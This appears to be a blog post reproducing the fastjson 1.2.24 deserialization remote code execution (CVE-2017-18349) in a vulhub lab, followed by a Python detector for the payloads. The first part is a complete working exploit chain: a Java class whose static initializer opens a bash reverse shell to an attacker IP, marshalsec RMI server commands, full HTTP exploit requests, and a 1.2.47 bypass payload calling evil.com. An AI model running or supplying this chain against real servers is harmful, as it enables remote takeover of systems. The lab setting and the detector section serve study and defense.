Fastjson 1.2.24 deserialization vulnerability (CVE-2017-18349) reproduction

Introduction to fastjson

fastjson is Alibaba's open-source JSON parsing library. It parses JSON-formatted strings, serializes JavaBeans into JSON strings, and deserializes JSON strings back into JavaBeans.

Affected versions

fastjson <= 1.2.24

Vulnerability reproduction

Using vulhub, enter the environment directory and start it with docker:
cd /app/vulhub-20201028/fastjson/1.2.24-rce
docker-compose up -d
Once the image has been pulled and the container is running, visit IP:8090 (here http://192.168.1.38:8090) and you will see output in JSON format.

Create a new TouchFile.java and compile it into a class file.

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    // Static initializer: runs as soon as the JVM loads this class.
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.43/4444 0>&1"});
            p.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}


Compile it:
javac TouchFile.java
Then serve the directory over HTTP with Python, so the class file is reachable at http://192.168.1.43:1234/TouchFile.class:
python -m SimpleHTTPServer 1234

Then, using the marshalsec project, start an RMI server listening on port 9999 that references the remote class TouchFile.class:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.43:1234/#TouchFile" 9999

Send the request:

POST / HTTP/1.1
Host: 192.168.1.38:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.43:9999/TouchFile",
        "autoCommit":true
    }
}


POST / HTTP/1.1
Host: 192.168.1.38:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.38:8888/TouchFile",
        "autoCommit":true
    }
}


Differences between reproducing 1.2.47 and 1.2.24

Only the payload sent to the target (range) server differs; the rest of the process is the same. The 1.2.47 payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}
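The request bodies shown for 1.2.24 and for 1.2.47 are the indicators a defender can key on. As an added example (not from the original post or from the fastjson project), the following Python check, which could run in a WAF rule, a log pipeline or a request filter, decodes a JSON body and flags the autoType patterns shown on this page: a denylisted "@type" such as com.sun.rowset.JdbcRowSetImpl, any string value pointing at an rmi:// or ldap:// reference, and the 1.2.47 trick of an earlier "@type":"java.lang.Class" with a "val" entry, which makes fastjson load the named class into its type cache so that the second object's "@type" is accepted despite the denylist. The gadget list and the sample bodies are constructed from the payloads on this page and are not an exhaustive denylist; the real fix is to upgrade fastjson and keep autoType disabled.

```python
import json
import re

# Constructed starting point, taken from the class used on this page; a real
# deployment would carry the full denylist of known gadget classes.
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
}

# JNDI references that pull a class from a remote server.
REMOTE_REF_RE = re.compile(r"^(rmi|ldap)://", re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively visit a decoded JSON value, recording autoType indicators."""
    if isinstance(node, dict):
        atype = node.get("@type")
        if isinstance(atype, str):
            if atype in GADGET_CLASSES:
                findings.append((path, "denylisted @type %s" % atype))
            # 1.2.47 bypass: java.lang.Class with "val" pre-loads a class into
            # fastjson's type cache so a later @type check passes.
            if atype == "java.lang.Class" and isinstance(node.get("val"), str):
                findings.append((path, "java.lang.Class/val autoType cache bypass for %s" % node["val"]))
        for key, value in node.items():
            child = path + "." + key
            if isinstance(value, str) and REMOTE_REF_RE.match(value):
                findings.append((child, "remote JNDI reference %s" % value))
            _walk(value, child, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, "%s[%d]" % (path, i), findings)


def scan_body(body):
    """Return a list of (json_path, reason) indicators found in a request body.
    Bodies that are not valid JSON yield an empty list."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    findings = []
    _walk(doc, "$", findings)
    return findings


def is_suspicious(body):
    """True if the body carries at least one autoType indicator."""
    return bool(scan_body(body))


# Sample bodies copied from the payloads on this page (the 1.2.47 one uses the
# page's evil.com placeholder) plus one constructed benign request.
PAYLOAD_1_2_24 = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.1.43:9999/TouchFile","autoCommit":true}}'
PAYLOAD_1_2_47 = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                  '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://evil.com:9999/Exploit","autoCommit":true}}')
BENIGN_BODY = '{"name":"alice","age":30,"tags":["a","b"]}'

if __name__ == "__main__":
    for label, body in (("1.2.24", PAYLOAD_1_2_24), ("1.2.47", PAYLOAD_1_2_47), ("benign", BENIGN_BODY)):
        print(label, "->", scan_body(body))
```

The walk reports the JSON path of each hit so a rule can log which key tripped it; for the 1.2.47 body it reports three indicators (the java.lang.Class/val entry under "a", then the denylisted "@type" and the rmi:// reference under "b"), for the 1.2.24 body two, and nothing for the benign request.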


Origin blog.csdn.net/weixin_44146996/article/details/111860438